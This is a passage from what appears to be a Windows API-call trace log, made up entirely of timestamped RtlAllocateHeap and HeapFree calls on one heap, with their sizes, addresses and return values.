out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103cf8 | out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106300 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105730 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105b20 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1058e0 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105c40 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105970 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1064b0 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106270 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105e80 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105850 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105f10 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1060c0 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105df0 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106030 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105bb0 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106390 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105d60 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106540 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a90 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1065d0 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a00 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106150 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1061e0 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1056a0 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106420 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1057c0 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107320 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106cf0 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1074d0 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107050 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107830 [0036.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107290 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106300 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b20 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105bb0 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105d60 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a90 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065d0 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107320 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106cf0 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1074d0 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107050 | out: hHeap=0xe0000) returned 1 [0036.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107830 | out: hHeap=0xe0000) returned 1 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107290 | out: hHeap=0xe0000) returned 1 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105cd0 | out: hHeap=0xe0000) returned 1 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xe6ed8 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x108bc8 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103a70 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106030 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103a58 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105f10 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103a58 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) 